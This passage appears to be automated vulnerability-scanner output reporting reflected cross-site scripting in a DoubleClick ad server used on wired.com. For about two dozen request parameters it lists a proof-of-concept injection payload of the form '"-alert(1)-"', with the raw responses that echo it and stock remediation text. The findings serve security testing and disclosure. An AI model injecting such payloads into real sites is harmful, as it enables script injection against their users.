<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:12:10 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 6619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=288db"-alert(1)-"a81bde65779&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295. ...[SNIP]...
The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c336"-alert(1)-"521d37aa33 was submitted in the pt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:07:27 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6909
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:12:10 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 3B2-0%3B0%3B55844876%3B4307-300/250%3B38010001/38027758/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=83012c336"-alert(1)-"521d37aa33&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI& ...[SNIP]...
The value of the ra request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca204"-alert(1)-"a9f792ba15b was submitted in the ra parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:12:47 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6913
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:12:10 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... =2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18ca204"-alert(1)-"a9f792ba15b&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.150723.CBSI&utm_medium=oa"); var fscUrl = url; var fs ...[SNIP]...
The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1a69"-alert(1)-"0a05ff2bab1 was submitted in the rqid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:10:28 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6913
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:12:10 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... D%3fhttp://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33Cb1a69"-alert(1)-"0a05ff2bab1&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH& ...[SNIP]...
The value of the sg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1a4d"-alert(1)-"84edf4b2caa was submitted in the sg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:04:34 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6914
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... escape("http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5a/17/181/%2a/x%3B231241976%3B0-0%3B0%3B55844876%3B4307-300/250%3B38009996/38027753/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8024&sg=476619f1a4d"-alert(1)-"84edf4b2caa&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdo ...[SNIP]...
The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3334"-alert(1)-"8bb98f76d2b was submitted in the site parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:06:48 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6913
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:12:10 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 1241976%3B2-0%3B0%3B55844876%3B4307-300/250%3B38010001/38027758/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3c3334"-alert(1)-"8bb98f76d2b&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqd ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4eed4"-alert(1)-"ce7690ba46a was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:04:07 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6913
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:11:31 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... var url = escape("http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5a/17/181/%2a/z%3B231241976%3B1-0%3B0%3B55844876%3B4307-300/250%3B38009999/38027756/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=80244eed4"-alert(1)-"ce7690ba46a&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppa ...[SNIP]...
The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38d85"-alert(1)-"ea05c790aae was submitted in the t parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:13:23 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6914
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.2038d85"-alert(1)-"ea05c790aae&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.150723.CBSI&utm_medium=oa"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; ...[SNIP]...
The value of the b request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 350a3"-alert(1)-"017b84a1884 was submitted in the b parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:05:34 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6820
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... click%3Bh%3Dv8/3a5a/17/16c/%2a/j%3B231242665%3B1-0%3B0%3B55844900%3B3454-728/90%3B38010000/38027757/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5350a3"-alert(1)-"017b84a1884&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0 ...[SNIP]...
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8abfc"-alert(1)-"81641716a0d was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:09:17 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6820
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... %3B0%3B55844900%3B3454-728/90%3B38010000/38027757/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=200122538abfc"-alert(1)-"81641716a0d&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event ...[SNIP]...
The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ce02"-alert(1)-"2612c838241 was submitted in the count parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:12:14 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6820
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=9ce02"-alert(1)-"2612c838241&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.150723.CBSI&utm_medium=oa"); var fsc ...[SNIP]...
The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49e73"-alert(1)-"58a8d0f3679 was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:11:55 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6820
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=49e73"-alert(1)-"58a8d0f3679&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.150723.CBSI&utm_medium=oa");
The value of the e request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13e74"-alert(1)-"23471b4e672 was submitted in the e parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:09:54 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6820
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 4900%3B3454-728/90%3B38010000/38027757/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=313e74"-alert(1)-"23471b4e672&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http:// ...[SNIP]...
The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79d10"-alert(1)-"bac537ef45c was submitted in the epartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:11:05 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6820
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... og.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=79d10"-alert(1)-"bac537ef45c&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na ...[SNIP]...
The value of the event request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload deb80"-alert(1)-"57c164cc6fa was submitted in the event parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 6808 Cache-Control: no-cache Pragma: no-cache Date: Mon, 22 Nov 2010 00:13:24 GMT Expires: Mon, 22 Nov 2010 00:13:24 GMT
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=deb80"-alert(1)-"57c164cc6fahttp://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.150723.CBSI&utm_medium=oa"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ...[SNIP]...
The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a34fd"-alert(1)-"bc95ae28570 was submitted in the h parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:04:57 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6820
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... ick.net/click%3Bh%3Dv8/3a5a/17/16c/%2a/s%3B231242665%3B0-0%3B0%3B55844900%3B3454-728/90%3B38009998/38027755/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cna34fd"-alert(1)-"bc95ae28570&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222. ...[SNIP]...
The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ec90"-alert(1)-"2a0e5843a31 was submitted in the l parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:05:58 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6820
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... h%3Dv8/3a5a/17/16c/%2a/s%3B231242665%3B0-0%3B0%3B55844900%3B3454-728/90%3B38009998/38027755/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US1ec90"-alert(1)-"2a0e5843a31&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI ...[SNIP]...
The value of the nd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c30a"-alert(1)-"784b7949c15 was submitted in the nd parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:07:31 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6820
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... %3B231242665%3B1-0%3B0%3B55844900%3B3454-728/90%3B38010000/38027757/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=270809c30a"-alert(1)-"784b7949c15&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11 ...[SNIP]...
The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 720cf"-alert(1)-"0b86199db39 was submitted in the o parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:04:37 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6820
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... bleclick.net/click%3Bh%3Dv8/3a5a/17/16c/%2a/s%3B231242665%3B0-0%3B0%3B55844900%3B3454-728/90%3B38009998/38027755/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a720cf"-alert(1)-"0b86199db39&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121 ...[SNIP]...
The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6bef2"-alert(1)-"ffd927cd787 was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:10:46 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6820
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... http://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=6bef2"-alert(1)-"ffd927cd787&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_sourc ...[SNIP]...
The value of the orh request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4a7c"-alert(1)-"431c9d2872f was submitted in the orh parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:10:28 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6820
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.comb4a7c"-alert(1)-"431c9d2872f&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=e ...[SNIP]...
The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1bee6"-alert(1)-"81ed37232b7 was submitted in the p parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:05:15 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6820
